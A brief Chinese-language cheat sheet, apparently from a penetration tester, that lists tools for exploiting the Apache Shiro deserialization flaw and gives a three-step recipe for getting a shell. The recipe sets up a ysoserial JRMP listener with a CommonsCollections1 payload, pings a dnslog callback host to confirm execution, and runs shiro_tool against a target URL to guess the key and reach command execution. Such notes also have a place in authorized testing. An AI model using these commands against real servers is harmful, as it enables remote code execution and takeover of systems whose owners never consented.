1、shiro反序列化漏洞综合利用工具
优点:图形化、傻瓜化工具,一键getshell
缺点:利用链少,回显方式少
2、ShiroExploit
基于ysoserial项目开发,payload多
3、ysoserial配合shiro_tool
ysoserial工具有多种payload
利用方式:
1、第一步
判断shiro利用链并在公网服务器起一个监听
java -cp ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections1 "ping xxxx.dnslog.cn"
2、第二步
使用shiro_tool
java -jar shiro_tool.jar url
自动判断key,成功后出现交互式shell,可输入监听ip:port
3、第三步
在第二步的交互式shell中输入第一步的ip和端口
成功后即可执行命令